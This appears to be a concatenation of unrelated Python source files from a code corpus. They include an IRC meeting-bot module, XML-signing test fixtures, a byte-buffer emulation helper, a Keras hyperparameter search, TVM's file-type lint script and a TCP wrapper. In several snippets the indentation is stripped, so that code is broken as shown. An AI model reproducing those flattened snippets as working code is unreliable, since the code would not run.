if not trigger.group(2):
        bot.say('try .link http://example.com')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
link = trigger.group(2)
if not link.startswith("http"):
link = "http://" + link
try:
title = find_title(link)
except:
title = ''
logplain('LINK: %s [%s]' % (link, title), trigger.sender)
logHTML_listitem('<a href="%s">%s</a>' % (link, title), trigger.sender)
bot.say('LINK: ' + link)
#Log informational item in the HTML log
@commands('info')
@example('.info all board members present')
def meetinginfo(bot, trigger):
"""
Log an informational item in the meeting log
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('try .info some informative thing')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
logplain('INFO: ' + trigger.group(2), trigger.sender)
logHTML_listitem(trigger.group(2), trigger.sender)
bot.say('INFO: ' + trigger.group(2))
#called for every single message
#Will log to plain text only
@rule('(.*)')
@priority('low')
def log_meeting(bot, trigger):
if not ismeetingrunning(trigger.sender):
return
    if trigger.startswith(('.endmeeting', '.chairs', '.action', '.info',
                           '.startmeeting', '.agreed', '.link', '.subject')):
return
logplain('<' + trigger.nick + '> ' + trigger, trigger.sender)
@commands('comment')
def take_comment(bot, trigger):
"""
Log a comment, to be shown with other comments when a chair uses .comments.
Intended to allow commentary from those outside the primary group of people
in the meeting.
Used in private message only, as `.comment <#channel> <comment to add>`
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not trigger.sender.is_nick():
return
    if not trigger.group(4):  # fewer than 2 arguments were given
bot.say('Usage: .comment <#channel> <comment to add>')
return
target, message = trigger.group(2).split(None, 1)
target = Identifier(target)
if not ismeetingrunning(target):
bot.say("There's not currently a meeting in that channel.")
else:
meetings_dict[trigger.group(3)]['comments'].append((trigger.nick, message))
bot.say("Your comment has been recorded. It will be shown when the"
" chairs tell me to show the comments.")
bot.msg(meetings_dict[trigger.group(3)]['head'], "A new comment has been recorded.")
@commands('comments')
def show_comments(bot, trigger):
"""
Show the comments that have been logged for this meeting with .comment.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
comments = meetings_dict[trigger.sender]['comments']
if comments:
msg = 'The following comments were made:'
bot.say(msg)
logplain('<%s> %s' % (bot.nick, msg), trigger.sender)
for comment in comments:
msg = '<%s> %s' % comment
bot.say(msg)
logplain('<%s> %s' % (bot.nick, msg), trigger.sender)
meetings_dict[trigger.sender]['comments'] = []
else:
bot.say('No comments have been logged.')
|
the-stack_106_23256 | import datetime
import shutil
from dataclasses import dataclass
from pathlib import Path
from subprocess import check_output
from typing import Callable, Tuple
import pytest
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKeyWithSerialization
from cryptography.hazmat.primitives.serialization import (
Encoding,
NoEncryption,
PrivateFormat,
)
from cryptography.x509 import Certificate, NameOID
from lxml.etree import Element
from minisignxml.config import SigningConfig
from minisignxml.internal import utils
from minisignxml.internal.constants import *
from minisignxml.internal.namespaces import ds
@pytest.fixture
def xmlsec1():
path = shutil.which("xmlsec1") or shutil.which("xmlsec1.exe")
if not path:
        pytest.skip("xmlsec1 not found")
def execute(*args):
return check_output((path,) + args)
return execute
@dataclass(frozen=True)
class KeyAndCert:
tmp_path: Path
private_key: RSAPrivateKeyWithSerialization
certificate: Certificate
def files(self) -> Tuple[str, str]:
pk_pem_path = self.tmp_path / "pk.pem"
cert_pem_path = self.tmp_path / "cert.pem"
with pk_pem_path.open("wb") as fobj:
fobj.write(
self.private_key.private_bytes(
Encoding.PEM, PrivateFormat.PKCS8, NoEncryption()
)
)
with cert_pem_path.open("wb") as fobj:
fobj.write(self.certificate.public_bytes(Encoding.PEM))
return str(pk_pem_path), str(cert_pem_path)
@pytest.fixture
def key_factory() -> Callable[[], Tuple[RSAPrivateKeyWithSerialization, Certificate]]:
def factory():
backend = default_backend()
key = rsa.generate_private_key(
public_exponent=65537, key_size=2048, backend=backend
)
cert = (
x509.CertificateBuilder()
.subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "test")]))
.issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "test")]))
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(datetime.datetime.utcnow())
.not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=1))
.sign(key, hashes.SHA256(), backend)
)
return key, cert
return factory
@pytest.fixture
def key_and_cert(tmp_path, key_factory) -> KeyAndCert:
key, cert = key_factory()
return KeyAndCert(tmp_path, key, cert)
@pytest.fixture
def signature_template() -> Callable[[SigningConfig], Element]:
def builder(
*, config: SigningConfig, certificate: Certificate, element_id: str
) -> Element:
return ds.Signature(
ds.SignedInfo(
ds.CanonicalizationMethod(Algorithm=XML_EXC_C14N),
ds.SignatureMethod(
Algorithm=utils.signature_method_algorithm(config.signature_method)
),
ds.Reference(
ds.Transforms(
ds.Transform(Algorithm=XMLDSIG_ENVELOPED_SIGNATURE),
ds.Transform(Algorithm=XML_EXC_C14N),
),
ds.DigestMethod(
Algorithm=utils.digest_method_algorithm(config.digest_method)
),
ds.DigestValue(),
URI="#" + element_id,
),
),
ds.SignatureValue(),
ds.KeyInfo(
ds.X509Data(utils.ascii_b64(certificate.public_bytes(Encoding.DER)))
),
)
return builder
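# Hypothetical example (not part of the original conftest, left commented out so that
# no test is collected from this file): shows how the fixtures above compose, using
# only the cryptography API that is already imported here.
#
# def test_generated_certificate_subject(key_and_cert):
#     (common_name,) = key_and_cert.certificate.subject.get_attributes_for_oid(
#         NameOID.COMMON_NAME
#     )
#     assert common_name.value == "test"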
|
the-stack_106_23257 | import re, math
class Int(int):
# def __repr__(self):
# return hex(self)
def __str__(self):
return hex(self)
def __add__(self, other):
return Int(super().__add__(other))
def __sub__(self, other):
return Int(super().__sub__(other))
def __lshift__(self, other):
return Int(super().__lshift__(other))
def __rshift__(self, other):
return Int(super().__rshift__(other))
def __xor__(self, other):
return Int(super().__xor__(other))
def __or__(self, other):
return Int(super().__or__(other))
def __and__(self, other):
return Int(super().__and__(other))
class Mem(object):
    MEM_Q_MODE = "q"  # 16-byte (quad) mode; must differ from MEM_X_MODE so both keep their own entries in the mapping dicts below
MEM_X_MODE = "x"
MEM_W_MODE = "w"
MEM_B_MODE = "b"
MEM_DEFAULT_MODE = MEM_X_MODE
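    # Note: "LATIN" in the constant names below denotes byte order (endianness):
    # 0 = big-endian, 1 = little-endian.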
MEM_BIG_LATIN = 0
MEM_LITTLE_LATIN = 1
MEM_DEFAULT_LATIN = MEM_LITTLE_LATIN
MEM_MODE_MAPPING = {
MEM_Q_MODE: 16,
MEM_X_MODE: 8,
MEM_W_MODE: 4,
MEM_B_MODE: 1
}
MEM_MODE_MASK_MAPPING = {
MEM_Q_MODE: 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF,
MEM_X_MODE: 0xFFFFFFFF_FFFFFFFF,
MEM_W_MODE: 0xFFFFFFFF,
MEM_B_MODE: 0xFF
}
def __init__(self, index:int, stack:list, mode=None, latin=None):
self.index = index
self.stack = stack
self.latin = latin
if self.latin is None:
self.latin = self.MEM_DEFAULT_LATIN
def read(self, item, mode=None):
if mode is None:
mode = Mem.MEM_DEFAULT_MODE
byte_size = Mem.MEM_MODE_MAPPING[mode]
return Mem.mem_read(self.stack[self.index + item:], 1, byte_size, self.latin)
def write(self, value, mode, latin):
if isinstance(value, Stack):
value = value.to_value()
assert isinstance(value, int), "required int value"
value = value & self.MEM_MODE_MASK_MAPPING[mode]
int_values = Mem.int_to_arr(value, mode)
if latin == 1:
int_values.reverse()
self[0] = Stack(0, int_values, mode, latin)
return self
@property
def x(self):
return Stack(self.index, self.stack, self.MEM_X_MODE, self.latin)
@x.setter
def x(self, value):
self.write(value, self.MEM_X_MODE, self.latin)
@property
def w(self):
return Stack(self.index, self.stack, self.MEM_W_MODE, self.latin)
@w.setter
def w(self, value):
self.write(value, self.MEM_W_MODE, self.latin)
@property
def b(self):
return Stack(self.index, self.stack, self.MEM_B_MODE, self.latin)
@b.setter
def b(self, value):
self.write(value, self.MEM_B_MODE, self.latin)
@property
def ldp(self):
        # Only x (8-byte) mode is supported; for w and other modes, use the other methods manually
return Mem.mem_read(self, 2, byte_size=8, mode=1)
@ldp.setter
def stp(self, value):
        # Only x (8-byte) mode is supported
self.x = value[0]
(self + 0x8).x = value[1]
def __getitem__(self, item):
if isinstance(item, slice):
s, e = item.start, item.stop
s = s + self.index if s else self.index
e = e + self.index if e else None
assert not e or len(self.stack) > e - s
return self.stack[slice(s, e, item.step)]
return self.stack[self.index + item]
def __setitem__(self, key, value):
        # Features: 1) the assigned value may be longer than the slice; 2) the overwritten range is adjusted automatically based on value
if isinstance(value, int):
self.stack[self.index + key:self.index + key + 1] = [value & 0xFF]
return
elif isinstance(value, Mem):
value = value.to_list()
assert isinstance(value, list)
if isinstance(key, slice):
s, e = key.start, key.stop
s = s + self.index if s else self.index
e = e + self.index if e else None
self.stack[slice(s, e, key.step)] = value
else:
self.stack[self.index + key:self.index + key + len(value)] = value
def __add__(self, other):
assert isinstance(other, int) and other < len(self)
return Mem(self.index + other, self.stack)
def __sub__(self, other):
assert isinstance(other, int) and self.index >= other
return Mem(self.index - other, self.stack)
def __xor__(self, other):
_a = self.to_list()
if isinstance(other, int):
return Mem(0, [_ ^ other for _ in _a])
if isinstance(other, Mem):
other = other.to_list()
assert isinstance(other, list)
_len = min(len(self), len(other))
return Mem(0, [_a[_] ^ other[_] for _ in range(_len)])
def __and__(self, other):
_a = self.to_list()
if isinstance(other, int):
return Mem(0, [_ & other for _ in _a])
if isinstance(other, Mem):
other = other.to_list()
assert isinstance(other, list)
_len = min(len(self), len(other))
return Mem(0, [_a[_] & other[_] for _ in range(_len)])
def __or__(self, other):
_a = self.to_list()
if isinstance(other, int):
return Mem(0, [_ | other for _ in _a])
if isinstance(other, Mem):
other = other.to_list()
assert isinstance(other, list)
_len = min(len(self), len(other))
return Mem(0, [_a[_] | other[_] for _ in range(_len)])
def __repr__(self):
if self.stack:
return Mem.hex(self.stack[self.index:self.index+32]) + "..."
return "Mem is None..."
def __len__(self):
return len(self.stack) - self.index
@staticmethod
def create(size, mode="b"):
assert isinstance(size, int)
return Mem(0, [0 for i in range(size)], mode)
def to_list(self):
return self.stack[self.index:]
def to_hex_list(self):
return [hex(_) for _ in self.stack[self.index:]]
@staticmethod
def mem_read(x0, return_size=1, byte_size=4, mode=1):
        # mode = 1: little-endian, mode = 0: big-endian
return_list = []
for i in range(return_size):
a = x0[i*byte_size:i*byte_size+byte_size]
if mode == 1:
a.reverse()
return_list.append(Mem.merge_arr_to_int(a))
if return_size == 1:
return return_list[0]
return return_list
@staticmethod
def merge_arr_to_int(arr):
        # If byte order applies, the array must already be arranged in that order
int_value = 0
arr.reverse()
for i, a in enumerate(arr):
int_value += a << i * 8
return Int(int_value)
@staticmethod
def int_to_arr(int_value, mode=None):
if mode is None:
mode = Mem.MEM_DEFAULT_MODE
byte_size = Mem.MEM_MODE_MAPPING[mode]
bstr = bin(int_value).replace("0b", "")
while len(bstr) % 8 != 0:
bstr = "0" + bstr
assert len(bstr) // 8 <= byte_size
barr = re.findall("[01]{8}", bstr)
barr = [Int("0b" + i, 2) for i in barr]
tmp_arr = [0 for _ in range(byte_size - len(barr))]
return tmp_arr + barr
@staticmethod
def read_file(file_path):
with open(file_path) as f:
text = f.read()
return Mem.read_text(text)
@staticmethod
def read_text(text):
results = re.findall("(0x[a-zA-Z0-9]+): (.+?)\\s\\s", text + " ")
stack = []
for result in results:
addr, value = result
values = [Int("0x" + v, 16) for v in value.split(" ")]
stack += values
return Mem(0, stack)
@staticmethod
def hex(value):
if isinstance(value, Mem):
mem_size = 16
int_list = value.to_list()
loop_time = math.ceil(len(int_list) / mem_size)
text = ""
for i in range(loop_time):
text += Mem.hex(int_list[i*mem_size:(i+1) * mem_size]) + "\n"
return text
elif isinstance(value, list):
int_value = []
for v in value:
if v <= 0xF:
v = "0" + hex(v).replace("0x", "")
else:
v = hex(v)
int_value.append(v.replace("0x", ""))
return " ".join(int_value)
else:
return hex(value)
class Stack(Mem):
def __init__(self, index, stack:list, mode=None, latin=None):
self.mode = mode or Mem.MEM_DEFAULT_MODE
        super().__init__(index, stack, latin=latin)  # pass latin by keyword so it is not consumed by Mem's unused mode parameter
def __getitem__(self, item):
result = super().__getitem__(slice(item, item + self.MEM_MODE_MAPPING[self.mode], None))
if self.latin:
result.reverse()
return Mem.merge_arr_to_int(result)
def to_value(self):
result = super().__getitem__(slice(0, 0 + self.MEM_MODE_MAPPING[self.mode], None))
if self.latin:
result.reverse()
return Mem.merge_arr_to_int(result)
def __setitem__(self, key, value):
        # Examples: x0[:] = value; x0[0] = value
        # x0 can be a Mem or a Stack; value is an int/Int
        assert isinstance(value, int)
        arr = Mem.int_to_arr(value, self.mode)
        if self.latin == 1:
            arr.reverse()
        super().__setitem__(key, arr)  # write the full byte-order-adjusted value
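# Hypothetical usage sketch (not part of the original module): demonstrates the
# register-style views (.x / .w / .b) on top of a flat little-endian byte buffer.
# The constants written below are illustrative.
if __name__ == "__main__":
    mem = Mem.create(32)                      # 32 zeroed bytes
    mem.x = 0x1122334455667788                # 8-byte little-endian write at offset 0
    print(mem)                                # hex dump of the underlying bytes
    print(Mem.hex(mem.read(0)))               # read the value back as a 64-bit integer
    print(Mem.hex((mem + 4).w.to_value()))    # 4-byte view starting at byte offset 4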
|
the-stack_106_23259 | from hyperopt import Trials, STATUS_OK, tpe
from hyperas import optim
from hyperas.distributions import choice, uniform
import os, sys
import numpy as np
from sklearn.utils import class_weight
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
from keras.utils import to_categorical
from keras import Input, models, layers, regularizers, callbacks, optimizers
from keras.utils import to_categorical
def data():
random_seed = 10
# data = np.load('/public/home/sry/mCNN/dataset/S2648/feature/mCNN/wild/npz/center_CA_PCA_False_neighbor_30.npz')
data = np.load('/dl/sry/mCNN/dataset/S2648/feature/mCNN/mutant/npz/center_CA_PCA_False_neighbor_100.npz')
# data = np.load('E:/projects/mCNN/yanglab/mCNN-master/dataset/S2648/mCNN/wild/center_CA_PCA_False_neighbor_30.npz')
x = data['x']
y = data['y']
ddg = data['ddg'].reshape(-1)
train_num = x.shape[0]
indices = [i for i in range(train_num)]
np.random.seed(random_seed)
np.random.shuffle(indices)
x = x[indices]
y = y[indices]
positive_indices, negative_indices = ddg >= 0, ddg < 0
x_positive, x_negative = x[positive_indices], x[negative_indices]
y_positive, y_negative = y[positive_indices], y[negative_indices]
left_positive, left_negative = round(0.8 * x_positive.shape[0]), round(0.8 * x_negative.shape[0])
x_train, x_test = np.vstack((x_positive[:left_positive], x_negative[:left_negative])), np.vstack(
(x_positive[left_positive:], x_negative[left_negative:]))
y_train, y_test = np.vstack((y_positive[:left_positive], y_negative[:left_negative])), np.vstack(
(y_positive[left_positive:], y_negative[left_negative:]))
# sort row default is chain
# reshape and one-hot
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
# normalization
train_shape = x_train.shape
test_shape = x_test.shape
col_train = train_shape[-1]
col_test = test_shape[-1]
x_train = x_train.reshape((-1, col_train))
x_test = x_test.reshape((-1, col_test))
mean = x_train.mean(axis=0)
std = x_train.std(axis=0)
std[np.argwhere(std == 0)] = 0.01
x_train -= mean
x_train /= std
x_test -= mean
x_test /= std
x_train = x_train.reshape(train_shape)
x_test = x_test.reshape(test_shape)
# reshape
x_train = x_train.reshape(x_train.shape + (1,))
x_test = x_test.reshape(x_test.shape + (1,))
return x_train, y_train, x_test, y_test
def Conv2DClassifierIn1(x_train,y_train,x_test,y_test):
summary = True
verbose = 1
# setHyperParams------------------------------------------------------------------------------------------------
batch_size = {{choice([32,64,128,256,512])}}
epoch = {{choice([25,50,75,100,125,150,175,200])}}
conv_block={{choice(['two', 'three', 'four'])}}
conv1_num={{choice([8, 16, 32, 64])}}
conv2_num={{choice([16,32,64,128])}}
conv3_num={{choice([32,64,128])}}
conv4_num={{choice([32, 64, 128, 256])}}
dense1_num={{choice([128, 256, 512])}}
dense2_num={{choice([64, 128, 256])}}
l1_regular_rate = {{uniform(0.00001, 1)}}
l2_regular_rate = {{uniform(0.000001, 1)}}
drop1_num={{uniform(0.1, 1)}}
drop2_num={{uniform(0.0001, 1)}}
activator={{choice(['elu','relu','tanh'])}}
optimizer={{choice(['adam','rmsprop','SGD'])}}
#---------------------------------------------------------------------------------------------------------------
kernel_size = (3, 3)
pool_size = (2, 2)
initializer = 'random_uniform'
padding_style = 'same'
loss_type='binary_crossentropy'
metrics=['accuracy']
my_callback = None
# early_stopping = EarlyStopping(monitor='val_loss', patience=4)
# checkpointer = ModelCheckpoint(filepath='keras_weights.hdf5',
# verbose=1,
# save_best_only=True)
# my_callback = callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2,
# patience=5, min_lr=0.0001)
# build --------------------------------------------------------------------------------------------------------
input_layer = Input(shape=x_train.shape[1:])
conv = layers.Conv2D(conv1_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(input_layer)
conv = layers.Conv2D(conv1_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(conv)
if conv_block == 'two':
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
elif conv_block == 'three':
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
elif conv_block == 'four':
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
conv = layers.Conv2D(conv4_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv4_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
flat = layers.Flatten()(pool)
drop = layers.Dropout(drop1_num)(flat)
dense = layers.Dense(dense1_num, activation=activator, kernel_regularizer=regularizers.l1_l2(l1=l1_regular_rate,l2=l2_regular_rate))(drop)
BatchNorm = layers.BatchNormalization(axis=-1)(dense)
drop = layers.Dropout(drop2_num)(BatchNorm)
dense = layers.Dense(dense2_num, activation=activator, kernel_regularizer=regularizers.l1_l2(l1=l1_regular_rate,l2=l2_regular_rate))(drop)
output_layer = layers.Dense(len(np.unique(y_train)),activation='softmax')(dense)
model = models.Model(inputs=input_layer, outputs=output_layer)
if summary:
model.summary()
# train(self):
class_weights = class_weight.compute_class_weight('balanced', np.unique(y_train), y_train.reshape(-1))
class_weights_dict = dict(enumerate(class_weights))
model.compile(optimizer=optimizer,
loss=loss_type,
metrics=metrics # accuracy
)
result = model.fit(x=x_train,
y=y_train,
batch_size=batch_size,
epochs=epoch,
verbose=verbose,
callbacks=my_callback,
validation_data=(x_test, y_test),
shuffle=True,
class_weight=class_weights_dict
)
validation_acc = np.amax(result.history['val_acc'])
print('Best validation acc of epoch:', validation_acc)
return {'loss': -validation_acc, 'status': STATUS_OK, 'model': model}
if __name__ == '__main__':
# config TF-----------------------------------------------------------------------------------------------------
CUDA, max_eval = sys.argv[1:]
os.environ['CUDA_VISIBLE_DEVICES'] = CUDA
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
set_session(tf.Session(config=config))
# x_train, y_train, x_test, y_test = data()
# Conv2DClassifierIn1(x_train, y_train, x_test, y_test)
    trials = Trials()
    best_run, best_model = optim.minimize(model=Conv2DClassifierIn1,
                                          data=data,
                                          algo=tpe.suggest,
                                          max_evals=int(max_eval),
                                          keep_temp=False,
                                          trials=trials)
    # Print the trials recorded during the hyperparameter search above.
    for trial in trials.trials:
        print(trial)
X_train, Y_train, X_test, Y_test = data()
print("Evalutation of best performing model:")
print(best_model.evaluate(X_test, Y_test))
print("Best performing model chosen hyper-parameters:")
print(best_run)
|
the-stack_106_23261 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Helper tool to check file types that are allowed to checkin."""
import os
import sys
import subprocess
# List of file types we allow
ALLOW_EXTENSION = {
# source code
"cc",
"c",
"h",
"s",
"rs",
"m",
"mm",
"g4",
"gradle",
"js",
"tcl",
"scala",
"java",
"go",
"sh",
"py",
"pyi",
"pxi",
"pyd",
"pyx",
"cu",
# relay text format
"rly",
# configurations
"mk",
"in",
"cmake",
"xml",
"toml",
"yml",
"yaml",
"json",
# docs
"txt",
"md",
"rst",
# sgx
"edl",
"lds",
# ios
"pbxproj",
"plist",
"xcworkspacedata",
"storyboard",
# hw/chisel
"sbt",
"properties",
"v",
"sdc",
# generated parser
"interp",
"tokens",
# interface definition
"idl",
}
# List of file names allowed
ALLOW_FILE_NAME = {
".gitignore",
".gitattributes",
"README",
"Makefile",
"Doxyfile",
"pylintrc",
"rat-excludes",
"log4j.properties",
".clang-format",
".gitmodules",
"CODEOWNERS",
".scalafmt.conf",
"Cargo.lock",
"with_the_same_user",
}
# List of specific files allowed in relpath to <proj_root>
ALLOW_SPECIFIC_FILE = {
"LICENSE",
"NOTICE",
"KEYS",
"DISCLAIMER",
"Jenkinsfile",
# cargo config
"rust/runtime/tests/test_wasm32/.cargo/config",
"apps/sgx/.cargo/config",
# html for demo purposes
"tests/webgl/test_static_webgl_library.html",
"web/example_rpc.html",
# images are normally not allowed
# discuss with committers before add more images
"apps/android_rpc/app/src/main/res/mipmap-hdpi/ic_launcher.png",
"apps/android_rpc/app/src/main/res/mipmap-mdpi/ic_launcher.png",
# documentation related files
"docs/_static/css/tvm_theme.css",
"docs/_static/img/tvm-logo-small.png",
"docs/_static/img/tvm-logo-square.png",
}
def filename_allowed(name):
"""Check if name is allowed by the current policy.
    Parameters
----------
name : str
Input name
Returns
-------
allowed : bool
Whether the filename is allowed.
"""
arr = name.rsplit(".", 1)
if arr[-1] in ALLOW_EXTENSION:
return True
if os.path.basename(name) in ALLOW_FILE_NAME:
return True
if os.path.basename(name).startswith("Dockerfile"):
return True
if name.startswith("3rdparty"):
return True
if name in ALLOW_SPECIFIC_FILE:
return True
return False
def copyright_line(line):
# Following two items are intentionally break apart
# so that the copyright detector won't detect the file itself.
if line.find("Copyright " + "(c)") != -1:
return True
if (line.find("Copyright") != -1 and
line.find(" by") != -1):
return True
return False
def check_asf_copyright(fname):
if fname.endswith(".png"):
return True
if not os.path.isfile(fname):
return True
has_asf_header = False
has_copyright = False
try:
for line in open(fname):
if line.find("Licensed to the Apache Software Foundation") != -1:
has_asf_header = True
if copyright_line(line):
has_copyright = True
if has_asf_header and has_copyright:
return False
except UnicodeDecodeError:
pass
return True
def main():
cmd = ["git", "ls-files"]
proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(out, _) = proc.communicate()
assert proc.returncode == 0
res = out.decode("utf-8")
flist = res.split()
error_list = []
for fname in flist:
if not filename_allowed(fname):
error_list.append(fname)
if error_list:
report = "------File type check report----\n"
report += "\n".join(error_list)
report += "\nFound %d files that are now allowed\n" % len(error_list)
report += ("We do not check in binary files into the repo.\n"
"If necessary, please discuss with committers and"
"modify tests/lint/check_file_type.py to enable the file you need.\n")
sys.stderr.write(report)
sys.stderr.flush()
sys.exit(-1)
asf_copyright_list = []
for fname in res.split():
if not check_asf_copyright(fname):
asf_copyright_list.append(fname)
if asf_copyright_list:
report = "------File type check report----\n"
report += "\n".join(asf_copyright_list) + "\n"
report += "------Found %d files that has ASF header with copyright message----\n" % len(asf_copyright_list)
report += "--- Files with ASF header do not need Copyright lines.\n"
report += "--- Contributors retain copyright to their contribution by default.\n"
report += "--- If a file comes with a different license, consider put it under the 3rdparty folder instead.\n"
report += "---\n"
report += "--- You can use the following steps to remove the copyright lines\n"
report += "--- Create file_list.txt in your text editor\n"
report += "--- Copy paste the above content in file-list into file_list.txt\n"
report += "--- python3 tests/lint/add_asf_header.py file_list.txt\n"
sys.stderr.write(report)
sys.stderr.flush()
sys.exit(-1)
print("check_file_type.py: all checks passed..")
if __name__ == "__main__":
main()
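# Typical invocation (presumably from the repository root, since the script relies on
# `git ls-files`):
#   python3 tests/lint/check_file_type.py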
|
the-stack_106_23266 | from point import Point
import socket
import json
class Connection:
"""A simple TCP wrapper class that acts a client OR server with similar
methods regardless of which it is connected as
"""
def __init__(self, port, host=None):
"""Creates a connection, basically a simple TCP client/server wrapper
Args:
port: the port to connect through
host: if set then will connect to that host as a client,
                otherwise acts as a server on host "0.0.0.0"
"""
self._tcp_socket = socket.socket()
self.curve = None
if not host:
            # then we are the server that accepts connection(s) from client(s)
host = "0.0.0.0"
# before connecting, reuse the port if needed
self._tcp_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
# and connect to the port as a server listening for clients
self._tcp_socket.bind((host, port))
self._tcp_socket.listen(1)
print("Connection listing on {}:{}\n".format(host, port))
self.connection, address = self._tcp_socket.accept()
else:
# we are a client connecting to a server
self._tcp_socket.connect((host, port))
self.connection = self._tcp_socket
print("Connection attempting to connect to {}:{}\n".format(
host, port
))
def send(self, obj):
"""Sends some object as json over the connection
Args:
obj: an object safe for json serialization
Note: Points can be serialized
"""
# ensure points safe for serialization
if isinstance(obj, Point):
obj = {'x': obj.x, 'y': obj.y}
string = json.dumps(obj)
self.connection.send(string.encode())
def read(self):
"""Read (blocking) from the connection until something is sent and parsed
Returns:
parsed json output from the connection
"""
buffer = ""
while True:
data = self.connection.recv(1024).decode()
if not data:
continue
data = str(data)
if data:
buffer += data
if len(data) == 1024:
continue # we need to read more data
else:
break
parsed = self._clean(json.loads(buffer))
return parsed
def close(self):
"""Closes this network connection(s)
"""
self.connection.close()
if self.connection != self._tcp_socket:
self._tcp_socket.close()
def _clean(self, parsed):
"""Cleans a parsed json object to Points if need be
Args:
parsed: valid json object already parsed such as a dict or string
Returns:
if parsed looks like a Point but is a dict, it will become a Point
"""
if (self.curve and isinstance(parsed, dict) and
'x' in parsed and 'y' in parsed):
parsed = Point(parsed['x'], parsed['y'], self.curve)
return parsed
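# Hypothetical usage sketch (not part of the original module). Run one process as the
# server and a second one with the "client" argument; port 5000 and localhost are
# illustrative values only.
if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1 and sys.argv[1] == "client":
        conn = Connection(5000, host="127.0.0.1")  # connect to the local server
        conn.send({"hello": "world"})
        print(conn.read())                         # expect the server's reply
    else:
        conn = Connection(5000)                    # listen on 0.0.0.0:5000
        print(conn.read())                         # expect {'hello': 'world'}
        conn.send("ack")
    conn.close()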
|
the-stack_106_23268 | """
picasso.simulate-gui
~~~~~~~~~~~~~~~~
GUI for Simulate :
        Simulate single molecule fluorescence data
:author: Maximilian Thomas Strauss, 2016
:copyright: Copyright (c) 2016 Jungmann Lab, MPI of Biochemistry
"""
import csv
import glob as _glob
import os
import sys
import time
import yaml
import matplotlib.patches as patches
import matplotlib.pyplot as plt
import numpy as _np
from matplotlib.backends.backend_qt4agg import (
FigureCanvasQTAgg as FigureCanvas,
)
from matplotlib.backends.backend_qt4agg import (
NavigationToolbar2QT as NavigationToolbar,
)
from PyQt5 import QtCore, QtGui, QtWidgets
from scipy.optimize import curve_fit
from scipy.stats import norm
import os.path as _ospath
from .. import io as _io
from .. import lib, simulate
def fitFuncBg(x, a, b):
return (a + b * x[0]) * x[1] * x[2]
def fitFuncStd(x, a, b, c):
return a * x[0] * x[1] + b * x[2] + c
